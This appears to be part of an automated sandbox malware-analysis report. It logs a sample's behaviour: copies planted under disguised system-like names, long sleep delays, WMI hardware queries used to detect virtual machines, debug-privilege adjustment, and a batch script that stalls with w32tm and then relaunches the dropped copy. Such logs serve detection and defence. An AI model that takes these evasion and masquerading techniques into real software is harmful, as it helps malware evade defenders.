Source: C:\Program Files (x86)\Windows Defender\StartMenuExperienceHost.exe TID: 5316 Thread sleep time: -599547s >= -30000s
Source: C:\Program Files (x86)\Windows Defender\StartMenuExperienceHost.exe TID: 5316 Thread sleep time: -599437s >= -30000s
Source: C:\Program Files (x86)\Windows Defender\StartMenuExperienceHost.exe TID: 5316 Thread sleep time: -599328s >= -30000s
Source: C:\Program Files (x86)\Windows Defender\StartMenuExperienceHost.exe TID: 5316 Thread sleep time: -599218s >= -30000s
Source: C:\Program Files (x86)\Windows Defender\StartMenuExperienceHost.exe TID: 5316 Thread sleep time: -599109s >= -30000s
Source: C:\Program Files (x86)\Windows Defender\StartMenuExperienceHost.exe TID: 5316 Thread sleep time: -599000s >= -30000s
Source: C:\Program Files (x86)\Windows Defender\StartMenuExperienceHost.exe TID: 5316 Thread sleep time: -598890s >= -30000s
Source: C:\Program Files (x86)\Windows Defender\StartMenuExperienceHost.exe TID: 5316 Thread sleep time: -598781s >= -30000s
Source: C:\Program Files (x86)\Windows Defender\StartMenuExperienceHost.exe TID: 5316 Thread sleep time: -598671s >= -30000s
Source: C:\Program Files (x86)\Windows Defender\StartMenuExperienceHost.exe TID: 5316 Thread sleep time: -598562s >= -30000s
Source: C:\Program Files (x86)\Windows Defender\StartMenuExperienceHost.exe TID: 5316 Thread sleep time: -598453s >= -30000s
Source: C:\Program Files (x86)\Windows Defender\StartMenuExperienceHost.exe TID: 5316 Thread sleep time: -598343s >= -30000s
Source: C:\Program Files (x86)\Windows Defender\StartMenuExperienceHost.exe TID: 5316 Thread sleep time: -598234s >= -30000s
Source: C:\Program Files (x86)\Windows Defender\StartMenuExperienceHost.exe TID: 1540 Thread sleep time: -30000s >= -30000s
Source: C:\Program Files (x86)\Windows Defender\StartMenuExperienceHost.exe TID: 4052 Thread sleep time: -922337203685477s >= -30000s
Source: C:\Program Files (x86)\Microsoft.NET\System.exe TID: 2912 Thread sleep count: 1469 > 30
Source: C:\Program Files (x86)\Microsoft.NET\System.exe TID: 2912 Thread sleep count: 2490 > 30
Source: C:\Program Files (x86)\Microsoft.NET\System.exe TID: 2404 Thread sleep time: -13835058055282155s >= -30000s
Source: C:\Program Files (x86)\Microsoft.NET\System.exe TID: 2404 Thread sleep time: -600000s >= -30000s
Source: C:\Program Files (x86)\Microsoft.NET\System.exe TID: 2404 Thread sleep time: -599890s >= -30000s
Source: C:\Program Files (x86)\Microsoft.NET\System.exe TID: 2404 Thread sleep time: -599781s >= -30000s
Source: C:\Program Files (x86)\Microsoft.NET\System.exe TID: 2404 Thread sleep time: -599672s >= -30000s
Source: C:\Program Files (x86)\Microsoft.NET\System.exe TID: 2404 Thread sleep time: -599563s >= -30000s
Source: C:\Program Files (x86)\Microsoft.NET\System.exe TID: 2404 Thread sleep time: -599453s >= -30000s
Source: C:\Program Files (x86)\Microsoft.NET\System.exe TID: 2404 Thread sleep time: -599344s >= -30000s
Source: C:\Program Files (x86)\Microsoft.NET\System.exe TID: 2404 Thread sleep time: -599234s >= -30000s
Source: C:\Program Files (x86)\Microsoft.NET\System.exe TID: 2404 Thread sleep time: -599125s >= -30000s
Source: C:\Program Files (x86)\Microsoft.NET\System.exe TID: 2404 Thread sleep time: -599013s >= -30000s
Source: C:\Program Files (x86)\Microsoft.NET\System.exe TID: 2404 Thread sleep time: -598906s >= -30000s
Source: C:\Program Files (x86)\Microsoft.NET\System.exe TID: 2404 Thread sleep time: -598797s >= -30000s
Source: C:\Program Files (x86)\Microsoft.NET\System.exe TID: 2404 Thread sleep time: -598686s >= -30000s
Source: C:\Program Files (x86)\Microsoft.NET\System.exe TID: 2404 Thread sleep time: -598578s >= -30000s
Source: C:\Program Files (x86)\Microsoft.NET\System.exe TID: 2404 Thread sleep time: -598267s >= -30000s
Source: C:\Program Files (x86)\Microsoft.NET\System.exe TID: 2404 Thread sleep time: -598141s >= -30000s
Source: C:\Program Files (x86)\Microsoft.NET\System.exe TID: 2308 Thread sleep time: -30000s >= -30000s
Source: C:\Program Files (x86)\Microsoft.NET\System.exe TID: 6956 Thread sleep time: -922337203685477s >= -30000s
Source: C:\Program Files (x86)\Microsoft.NET\System.exe TID: 2912 Thread sleep time: -922337203685477s >= -30000s
Source: C:\Program Files (x86)\Microsoft.NET\Primary Interop Assemblies\xMLVfJVxhYAkoCJ.exe TID: 7028 Thread sleep count: 1930 > 30
Source: C:\Program Files (x86)\Microsoft.NET\Primary Interop Assemblies\xMLVfJVxhYAkoCJ.exe TID: 1216 Thread sleep count: 2373 > 30
Source: C:\Program Files (x86)\Microsoft.NET\Primary Interop Assemblies\xMLVfJVxhYAkoCJ.exe TID: 5740 Thread sleep time: -8301034833169293s >= -30000s
Source: C:\Program Files (x86)\Microsoft.NET\Primary Interop Assemblies\xMLVfJVxhYAkoCJ.exe TID: 5740 Thread sleep time: -600000s >= -30000s
Source: C:\Program Files (x86)\Microsoft.NET\Primary Interop Assemblies\xMLVfJVxhYAkoCJ.exe TID: 5740 Thread sleep time: -599875s >= -30000s
Source: C:\Program Files (x86)\Microsoft.NET\Primary Interop Assemblies\xMLVfJVxhYAkoCJ.exe TID: 5740 Thread sleep time: -599765s >= -30000s
Source: C:\Program Files (x86)\Microsoft.NET\Primary Interop Assemblies\xMLVfJVxhYAkoCJ.exe TID: 5740 Thread sleep time: -599654s >= -30000s
Source: C:\Program Files (x86)\Microsoft.NET\Primary Interop Assemblies\xMLVfJVxhYAkoCJ.exe TID: 5740 Thread sleep time: -599531s >= -30000s
Source: C:\Program Files (x86)\Microsoft.NET\Primary Interop Assemblies\xMLVfJVxhYAkoCJ.exe TID: 5740 Thread sleep time: -599421s >= -30000s
Source: C:\Program Files (x86)\Microsoft.NET\Primary Interop Assemblies\xMLVfJVxhYAkoCJ.exe TID: 5740 Thread sleep time: -599312s >= -30000s
Source: C:\Program Files (x86)\Microsoft.NET\Primary Interop Assemblies\xMLVfJVxhYAkoCJ.exe TID: 5740 Thread sleep time: -599203s >= -30000s
Source: C:\Program Files (x86)\Microsoft.NET\Primary Interop Assemblies\xMLVfJVxhYAkoCJ.exe TID: 5740 Thread sleep time: -599094s >= -30000s
Source: C:\Program Files (x86)\Microsoft.NET\Primary Interop Assemblies\xMLVfJVxhYAkoCJ.exe TID: 5740 Thread sleep time: -598969s >= -30000s
Source: C:\Program Files (x86)\Microsoft.NET\Primary Interop Assemblies\xMLVfJVxhYAkoCJ.exe TID: 5740 Thread sleep time: -598859s >= -30000s
Source: C:\Program Files (x86)\Microsoft.NET\Primary Interop Assemblies\xMLVfJVxhYAkoCJ.exe TID: 5740 Thread sleep time: -598750s >= -30000s
Source: C:\Program Files (x86)\Microsoft.NET\Primary Interop Assemblies\xMLVfJVxhYAkoCJ.exe TID: 5740 Thread sleep time: -598640s >= -30000s
Source: C:\Program Files (x86)\Microsoft.NET\Primary Interop Assemblies\xMLVfJVxhYAkoCJ.exe TID: 5740 Thread sleep time: -598531s >= -30000s
Source: C:\Program Files (x86)\Microsoft.NET\Primary Interop Assemblies\xMLVfJVxhYAkoCJ.exe TID: 5740 Thread sleep time: -598422s >= -30000s
Source: C:\Program Files (x86)\Microsoft.NET\Primary Interop Assemblies\xMLVfJVxhYAkoCJ.exe TID: 5740 Thread sleep time: -598312s >= -30000s
Source: C:\Program Files (x86)\Microsoft.NET\Primary Interop Assemblies\xMLVfJVxhYAkoCJ.exe TID: 5740 Thread sleep time: -598203s >= -30000s
Source: C:\Program Files (x86)\Microsoft.NET\Primary Interop Assemblies\xMLVfJVxhYAkoCJ.exe TID: 4440 Thread sleep time: -30000s >= -30000s
Source: C:\Program Files (x86)\Microsoft.NET\Primary Interop Assemblies\xMLVfJVxhYAkoCJ.exe TID: 7072 Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\System32\schtasks.exe WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_BaseBoard
Source: C:\Windows\System32\schtasks.exe WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_BIOS
Source: C:\Windows\System32\schtasks.exe WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_BaseBoard
Source: C:\Windows\System32\schtasks.exe WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_BIOS
Source: C:\Windows\System32\schtasks.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BIOS
Source: C:\Windows\System32\schtasks.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BIOS
Source: C:\Program Files\Microsoft Office 15\ClientX64\Registry.exe WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_BaseBoard
Source: C:\Program Files\Microsoft Office 15\ClientX64\Registry.exe WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_BIOS
Source: C:\Program Files (x86)\Windows Defender\StartMenuExperienceHost.exe WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_BaseBoard
Source: C:\Program Files (x86)\Windows Defender\StartMenuExperienceHost.exe WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_BIOS
Source: C:\Program Files (x86)\Microsoft.NET\System.exe WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_BaseBoard
Source: C:\Program Files (x86)\Microsoft.NET\System.exe WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_BIOS
Source: C:\Program Files (x86)\Microsoft.NET\Primary Interop Assemblies\xMLVfJVxhYAkoCJ.exe WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_BaseBoard
Source: C:\Program Files (x86)\Microsoft.NET\Primary Interop Assemblies\xMLVfJVxhYAkoCJ.exe WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_BIOS
Source: C:\Windows\System32\schtasks.exe WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_ComputerSystem
Source: C:\Windows\System32\schtasks.exe WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_ComputerSystem
Source: C:\Windows\System32\schtasks.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_ComputerSystem
Source: C:\Windows\System32\schtasks.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_ComputerSystem
Source: C:\Program Files\Microsoft Office 15\ClientX64\Registry.exe WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_ComputerSystem
Source: C:\Program Files (x86)\Windows Defender\StartMenuExperienceHost.exe WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_ComputerSystem
Source: C:\Program Files (x86)\Microsoft.NET\System.exe WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_ComputerSystem
Source: C:\Program Files (x86)\Microsoft.NET\Primary Interop Assemblies\xMLVfJVxhYAkoCJ.exe WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_ComputerSystem
Source: C:\Windows\System32\schtasks.exe WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_Processor
Source: C:\Windows\System32\schtasks.exe WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_Processor
Source: C:\Program Files\Microsoft Office 15\ClientX64\Registry.exe WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_Processor
Source: C:\Program Files (x86)\Windows Defender\StartMenuExperienceHost.exe WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_Processor
Source: C:\Program Files (x86)\Microsoft.NET\System.exe WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_Processor
Source: C:\Program Files (x86)\Microsoft.NET\Primary Interop Assemblies\xMLVfJVxhYAkoCJ.exe WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_Processor
Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
Source: C:\Users\user\Desktop\XPC5PMKegV.exe File Volume queried: C:\ FullSizeInformation Jump to behavior
Source: C:\Recovery\xMLVfJVxhYAkoCJ.exe File Volume queried: C:\ FullSizeInformation Jump to behavior
Source: C:\Program Files\Microsoft Office 15\ClientX64\Registry.exe File Volume queried: C:\ FullSizeInformation Jump to behavior
Source: C:\Program Files\Microsoft Office 15\ClientX64\Registry.exe File Volume queried: C:\ FullSizeInformation Jump to behavior
Source: C:\Program Files (x86)\Windows Defender\StartMenuExperienceHost.exe File Volume queried: C:\ FullSizeInformation Jump to behavior
Source: C:\Program Files (x86)\Windows Defender\StartMenuExperienceHost.exe File Volume queried: C:\ FullSizeInformation
Source: C:\Program Files (x86)\Microsoft.NET\System.exe File Volume queried: C:\ FullSizeInformation
Source: C:\Program Files (x86)\Microsoft.NET\System.exe File Volume queried: C:\ FullSizeInformation
Source: C:\Program Files (x86)\Microsoft.NET\Primary Interop Assemblies\xMLVfJVxhYAkoCJ.exe File Volume queried: C:\ FullSizeInformation
Source: C:\Program Files (x86)\Microsoft.NET\Primary Interop Assemblies\xMLVfJVxhYAkoCJ.exe File Volume queried: C:\ FullSizeInformation
Source: C:\Program Files (x86)\Microsoft.NET\Primary Interop Assemblies\xMLVfJVxhYAkoCJ.exe File Volume queried: C:\ FullSizeInformation
Source: C:\Program Files\Microsoft Office 15\ClientX64\Registry.exe File Volume queried: C:\ FullSizeInformation
Source: C:\Program Files (x86)\Windows Defender\StartMenuExperienceHost.exe File Volume queried: C:\ FullSizeInformation
Source: C:\Program Files (x86)\Microsoft.NET\System.exe File Volume queried: C:\ FullSizeInformation
Source: C:\Program Files (x86)\Microsoft.NET\Primary Interop Assemblies\xMLVfJVxhYAkoCJ.exe File Volume queried: C:\ FullSizeInformation
Source: C:\Users\user\Desktop\XPC5PMKegV.exe Thread delayed: delay time: 922337203685477 Jump to behavior
Source: C:\Recovery\xMLVfJVxhYAkoCJ.exe Thread delayed: delay time: 922337203685477 Jump to behavior
Source: C:\Program Files\Microsoft Office 15\ClientX64\Registry.exe Thread delayed: delay time: 922337203685477 Jump to behavior
Source: C:\Program Files\Microsoft Office 15\ClientX64\Registry.exe Thread delayed: delay time: 922337203685477 Jump to behavior
Source: C:\Program Files (x86)\Windows Defender\StartMenuExperienceHost.exe Thread delayed: delay time: 922337203685477 Jump to behavior
Source: C:\Program Files (x86)\Windows Defender\StartMenuExperienceHost.exe Thread delayed: delay time: 922337203685477
Source: C:\Program Files (x86)\Microsoft.NET\System.exe Thread delayed: delay time: 922337203685477
Source: C:\Program Files (x86)\Microsoft.NET\System.exe Thread delayed: delay time: 922337203685477
Source: C:\Program Files (x86)\Microsoft.NET\Primary Interop Assemblies\xMLVfJVxhYAkoCJ.exe Thread delayed: delay time: 922337203685477
Source: C:\Program Files (x86)\Microsoft.NET\Primary Interop Assemblies\xMLVfJVxhYAkoCJ.exe Thread delayed: delay time: 922337203685477
Source: C:\Program Files (x86)\Microsoft.NET\Primary Interop Assemblies\xMLVfJVxhYAkoCJ.exe Thread delayed: delay time: 922337203685477
Source: C:\Program Files\Microsoft Office 15\ClientX64\Registry.exe Thread delayed: delay time: 922337203685477
Source: C:\Program Files\Microsoft Office 15\ClientX64\Registry.exe Thread delayed: delay time: 600000
Source: C:\Program Files\Microsoft Office 15\ClientX64\Registry.exe Thread delayed: delay time: 599890
Source: C:\Program Files\Microsoft Office 15\ClientX64\Registry.exe Thread delayed: delay time: 599781
Source: C:\Program Files\Microsoft Office 15\ClientX64\Registry.exe Thread delayed: delay time: 599672
Source: C:\Program Files\Microsoft Office 15\ClientX64\Registry.exe Thread delayed: delay time: 599562
Source: C:\Program Files\Microsoft Office 15\ClientX64\Registry.exe Thread delayed: delay time: 599453
Source: C:\Program Files\Microsoft Office 15\ClientX64\Registry.exe Thread delayed: delay time: 599343
Source: C:\Program Files\Microsoft Office 15\ClientX64\Registry.exe Thread delayed: delay time: 599234
Source: C:\Program Files\Microsoft Office 15\ClientX64\Registry.exe Thread delayed: delay time: 599125
Source: C:\Program Files\Microsoft Office 15\ClientX64\Registry.exe Thread delayed: delay time: 599015
Source: C:\Program Files\Microsoft Office 15\ClientX64\Registry.exe Thread delayed: delay time: 598906
Source: C:\Program Files\Microsoft Office 15\ClientX64\Registry.exe Thread delayed: delay time: 598797
Source: C:\Program Files\Microsoft Office 15\ClientX64\Registry.exe Thread delayed: delay time: 598687
Source: C:\Program Files\Microsoft Office 15\ClientX64\Registry.exe Thread delayed: delay time: 598578
Source: C:\Program Files\Microsoft Office 15\ClientX64\Registry.exe Thread delayed: delay time: 598468
Source: C:\Program Files\Microsoft Office 15\ClientX64\Registry.exe Thread delayed: delay time: 598356
Source: C:\Program Files\Microsoft Office 15\ClientX64\Registry.exe Thread delayed: delay time: 598248
Source: C:\Program Files\Microsoft Office 15\ClientX64\Registry.exe Thread delayed: delay time: 922337203685477
Source: C:\Program Files (x86)\Windows Defender\StartMenuExperienceHost.exe Thread delayed: delay time: 922337203685477
Source: C:\Program Files (x86)\Windows Defender\StartMenuExperienceHost.exe Thread delayed: delay time: 600000
Source: C:\Program Files (x86)\Windows Defender\StartMenuExperienceHost.exe Thread delayed: delay time: 599875
Source: C:\Program Files (x86)\Windows Defender\StartMenuExperienceHost.exe Thread delayed: delay time: 599765
Source: C:\Program Files (x86)\Windows Defender\StartMenuExperienceHost.exe Thread delayed: delay time: 599656
Source: C:\Program Files (x86)\Windows Defender\StartMenuExperienceHost.exe Thread delayed: delay time: 599547
Source: C:\Program Files (x86)\Windows Defender\StartMenuExperienceHost.exe Thread delayed: delay time: 599437
Source: C:\Program Files (x86)\Windows Defender\StartMenuExperienceHost.exe Thread delayed: delay time: 599328
Source: C:\Program Files (x86)\Windows Defender\StartMenuExperienceHost.exe Thread delayed: delay time: 599218
Source: C:\Program Files (x86)\Windows Defender\StartMenuExperienceHost.exe Thread delayed: delay time: 599109
Source: C:\Program Files (x86)\Windows Defender\StartMenuExperienceHost.exe Thread delayed: delay time: 599000
Source: C:\Program Files (x86)\Windows Defender\StartMenuExperienceHost.exe Thread delayed: delay time: 598890
Source: C:\Program Files (x86)\Windows Defender\StartMenuExperienceHost.exe Thread delayed: delay time: 598781
Source: C:\Program Files (x86)\Windows Defender\StartMenuExperienceHost.exe Thread delayed: delay time: 598671
Source: C:\Program Files (x86)\Windows Defender\StartMenuExperienceHost.exe Thread delayed: delay time: 598562
Source: C:\Program Files (x86)\Windows Defender\StartMenuExperienceHost.exe Thread delayed: delay time: 598453
Source: C:\Program Files (x86)\Windows Defender\StartMenuExperienceHost.exe Thread delayed: delay time: 598343
Source: C:\Program Files (x86)\Windows Defender\StartMenuExperienceHost.exe Thread delayed: delay time: 598234
Source: C:\Program Files (x86)\Windows Defender\StartMenuExperienceHost.exe Thread delayed: delay time: 922337203685477
Source: C:\Program Files (x86)\Microsoft.NET\System.exe Thread delayed: delay time: 922337203685477
Source: C:\Program Files (x86)\Microsoft.NET\System.exe Thread delayed: delay time: 600000
Source: C:\Program Files (x86)\Microsoft.NET\System.exe Thread delayed: delay time: 599890
Source: C:\Program Files (x86)\Microsoft.NET\System.exe Thread delayed: delay time: 599781
Source: C:\Program Files (x86)\Microsoft.NET\System.exe Thread delayed: delay time: 599672
Source: C:\Program Files (x86)\Microsoft.NET\System.exe Thread delayed: delay time: 599563
Source: C:\Program Files (x86)\Microsoft.NET\System.exe Thread delayed: delay time: 599453
Source: C:\Program Files (x86)\Microsoft.NET\System.exe Thread delayed: delay time: 599344
Source: C:\Program Files (x86)\Microsoft.NET\System.exe Thread delayed: delay time: 599234
Source: C:\Program Files (x86)\Microsoft.NET\System.exe Thread delayed: delay time: 599125
Source: C:\Program Files (x86)\Microsoft.NET\System.exe Thread delayed: delay time: 599013
Source: C:\Program Files (x86)\Microsoft.NET\System.exe Thread delayed: delay time: 598906
Source: C:\Program Files (x86)\Microsoft.NET\System.exe Thread delayed: delay time: 598797
Source: C:\Program Files (x86)\Microsoft.NET\System.exe Thread delayed: delay time: 598686
Source: C:\Program Files (x86)\Microsoft.NET\System.exe Thread delayed: delay time: 598578
Source: C:\Program Files (x86)\Microsoft.NET\System.exe Thread delayed: delay time: 598267
Source: C:\Program Files (x86)\Microsoft.NET\System.exe Thread delayed: delay time: 598141
Source: C:\Program Files (x86)\Microsoft.NET\System.exe Thread delayed: delay time: 922337203685477
Source: C:\Program Files (x86)\Microsoft.NET\System.exe Thread delayed: delay time: 922337203685477
Source: C:\Program Files (x86)\Microsoft.NET\Primary Interop Assemblies\xMLVfJVxhYAkoCJ.exe Thread delayed: delay time: 922337203685477
Source: C:\Program Files (x86)\Microsoft.NET\Primary Interop Assemblies\xMLVfJVxhYAkoCJ.exe Thread delayed: delay time: 600000
Source: C:\Program Files (x86)\Microsoft.NET\Primary Interop Assemblies\xMLVfJVxhYAkoCJ.exe Thread delayed: delay time: 599875
Source: C:\Program Files (x86)\Microsoft.NET\Primary Interop Assemblies\xMLVfJVxhYAkoCJ.exe Thread delayed: delay time: 599765
Source: C:\Program Files (x86)\Microsoft.NET\Primary Interop Assemblies\xMLVfJVxhYAkoCJ.exe Thread delayed: delay time: 599654
Source: C:\Program Files (x86)\Microsoft.NET\Primary Interop Assemblies\xMLVfJVxhYAkoCJ.exe Thread delayed: delay time: 599531
Source: C:\Program Files (x86)\Microsoft.NET\Primary Interop Assemblies\xMLVfJVxhYAkoCJ.exe Thread delayed: delay time: 599421
Source: C:\Program Files (x86)\Microsoft.NET\Primary Interop Assemblies\xMLVfJVxhYAkoCJ.exe Thread delayed: delay time: 599312
Source: C:\Program Files (x86)\Microsoft.NET\Primary Interop Assemblies\xMLVfJVxhYAkoCJ.exe Thread delayed: delay time: 599203
Source: C:\Program Files (x86)\Microsoft.NET\Primary Interop Assemblies\xMLVfJVxhYAkoCJ.exe Thread delayed: delay time: 599094
Source: C:\Program Files (x86)\Microsoft.NET\Primary Interop Assemblies\xMLVfJVxhYAkoCJ.exe Thread delayed: delay time: 598969
Source: C:\Program Files (x86)\Microsoft.NET\Primary Interop Assemblies\xMLVfJVxhYAkoCJ.exe Thread delayed: delay time: 598859
Source: C:\Program Files (x86)\Microsoft.NET\Primary Interop Assemblies\xMLVfJVxhYAkoCJ.exe Thread delayed: delay time: 598750
Source: C:\Program Files (x86)\Microsoft.NET\Primary Interop Assemblies\xMLVfJVxhYAkoCJ.exe Thread delayed: delay time: 598640
Source: C:\Program Files (x86)\Microsoft.NET\Primary Interop Assemblies\xMLVfJVxhYAkoCJ.exe Thread delayed: delay time: 598531
Source: C:\Program Files (x86)\Microsoft.NET\Primary Interop Assemblies\xMLVfJVxhYAkoCJ.exe Thread delayed: delay time: 598422
Source: C:\Program Files (x86)\Microsoft.NET\Primary Interop Assemblies\xMLVfJVxhYAkoCJ.exe Thread delayed: delay time: 598312
Source: C:\Program Files (x86)\Microsoft.NET\Primary Interop Assemblies\xMLVfJVxhYAkoCJ.exe Thread delayed: delay time: 598203
Source: C:\Program Files (x86)\Microsoft.NET\Primary Interop Assemblies\xMLVfJVxhYAkoCJ.exe Thread delayed: delay time: 922337203685477
Source: C:\Users\user\Desktop\XPC5PMKegV.exe File opened: C:\Users\user\AppData Jump to behavior
Source: C:\Users\user\Desktop\XPC5PMKegV.exe File opened: C:\Users\user\AppData\Local Jump to behavior
Source: C:\Users\user\Desktop\XPC5PMKegV.exe File opened: C:\Users\user Jump to behavior
Source: C:\Users\user\Desktop\XPC5PMKegV.exe File opened: C:\Users\user\Documents\desktop.ini Jump to behavior
Source: C:\Users\user\Desktop\XPC5PMKegV.exe File opened: C:\Users\user\Desktop\desktop.ini Jump to behavior
Source: C:\Users\user\Desktop\XPC5PMKegV.exe File opened: C:\Users\user\AppData\Local\Temp Jump to behavior
Source: xMLVfJVxhYAkoCJ.exe, 00000029.00000002.2646534252.000000001BC6F000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll|
Source: XPC5PMKegV.exe, 00000000.00000002.2132442923.000000001BD6D000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: \\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\\?\Volume{a33c736e-61ca-11ee-8c18-806e6f6e6963}\qb&?
Source: w32tm.exe, 0000001A.00000002.2179361537.000001B63E2D8000.00000004.00000020.00020000.00000000.sdmp, StartMenuExperienceHost.exe, 00000026.00000002.2467348183.000000001B700000.00000004.00000020.00020000.00000000.sdmp, System.exe, 00000028.00000002.2528852928.000000001C050000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
Source: C:\Users\user\Desktop\XPC5PMKegV.exe Process information queried: ProcessInformation Jump to behavior
Source: C:\Users\user\Desktop\XPC5PMKegV.exe Process token adjusted: Debug Jump to behavior
Source: C:\Program Files\Microsoft Office 15\ClientX64\Registry.exe Process token adjusted: Debug Jump to behavior
Source: C:\Program Files\Microsoft Office 15\ClientX64\Registry.exe Process token adjusted: Debug Jump to behavior
Source: C:\Program Files (x86)\Windows Defender\StartMenuExperienceHost.exe Process token adjusted: Debug Jump to behavior
Source: C:\Program Files (x86)\Windows Defender\StartMenuExperienceHost.exe Process token adjusted: Debug
Source: C:\Program Files (x86)\Microsoft.NET\System.exe Process token adjusted: Debug
Source: C:\Program Files (x86)\Microsoft.NET\System.exe Process token adjusted: Debug
Source: C:\Program Files (x86)\Microsoft.NET\Primary Interop Assemblies\xMLVfJVxhYAkoCJ.exe Process token adjusted: Debug
Source: C:\Program Files (x86)\Microsoft.NET\Primary Interop Assemblies\xMLVfJVxhYAkoCJ.exe Process token adjusted: Debug
Source: C:\Users\user\Desktop\XPC5PMKegV.exe Memory allocated: page read and write | page guard Jump to behavior
Source: C:\Users\user\Desktop\XPC5PMKegV.exe Process created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /C "C:\Users\user\AppData\Local\Temp\yrs7rIEeUp.bat" Jump to behavior
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\w32tm.exe w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2 Jump to behavior
Source: C:\Windows\System32\cmd.exe Process created: C:\Program Files (x86)\Microsoft.NET\Primary Interop Assemblies\xMLVfJVxhYAkoCJ.exe "C:\Program Files (x86)\microsoft.net\Primary Interop Assemblies\xMLVfJVxhYAkoCJ.exe" Jump to behavior
Source: C:\Users\user\Desktop\XPC5PMKegV.exe Queries volume information: C:\Users\user\Desktop\XPC5PMKegV.exe VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\XPC5PMKegV.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformation Jump to behavior
Source: C:\Recovery\xMLVfJVxhYAkoCJ.exe Queries volume information: C:\Recovery\xMLVfJVxhYAkoCJ.exe VolumeInformation Jump to behavior
Source: C:\Windows\System32\cmd.exe Queries volume information: C:\ VolumeInformation Jump to behavior
Source: C:\Program Files\Microsoft Office 15\ClientX64\Registry.exe Queries volume information: C:\Program Files\Microsoft Office 15\ClientX64\Registry.exe VolumeInformation Jump to behavior
Source: C:\Program Files\Microsoft Office 15\ClientX64\Registry.exe Queries volume information: C:\Program Files\Microsoft Office 15\ClientX64\Registry.exe VolumeInformation Jump to behavior
Source: C:\Program Files (x86)\Windows Defender\StartMenuExperienceHost.exe Queries volume information: C:\Program Files (x86)\Windows Defender\StartMenuExperienceHost.exe VolumeInformation Jump to behavior
Source: C:\Program Files (x86)\Windows Defender\StartMenuExperienceHost.exe Queries volume information: C:\Program Files (x86)\Windows Defender\StartMenuExperienceHost.exe VolumeInformation
Source: C:\Program Files (x86)\Microsoft.NET\System.exe Queries volume information: C:\Program Files (x86)\Microsoft.NET\System.exe VolumeInformation
Source: C:\Program Files (x86)\Microsoft.NET\System.exe Queries volume information: C:\Program Files (x86)\Microsoft.NET\System.exe VolumeInformation
Source: C:\Program Files (x86)\Microsoft.NET\Primary Interop Assemblies\xMLVfJVxhYAkoCJ.exe Queries volume information: C:\Program Files (x86)\Microsoft.NET\Primary Interop Assemblies\xMLVfJVxhYAkoCJ.exe VolumeInformation
Source: C:\Program Files (x86)\Microsoft.NET\Primary Interop Assemblies\xMLVfJVxhYAkoCJ.exe Queries volume information: C:\Program Files (x86)\Microsoft.NET\Primary Interop Assemblies\xMLVfJVxhYAkoCJ.exe VolumeInformation
Source: C:\Program Files (x86)\Microsoft.NET\Primary Interop Assemblies\xMLVfJVxhYAkoCJ.exe Queries volume information: C:\Program Files (x86)\Microsoft.NET\Primary Interop Assemblies\xMLVfJVxhYAkoCJ.exe VolumeInformation
Source: C:\Program Files\Microsoft Office 15\ClientX64\Registry.exe Queries volume information: C:\Program Files\Microsoft Office 15\ClientX64\Registry.exe VolumeInformation
Source: C:\Program Files\Microsoft Office 15\ClientX64\Registry.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformation
Source: C:\Program Files (x86)\Windows Defender\StartMenuExperienceHost.exe Queries volume information: C:\Program Files (x86)\Windows Defender\StartMenuExperienceHost.exe VolumeInformation
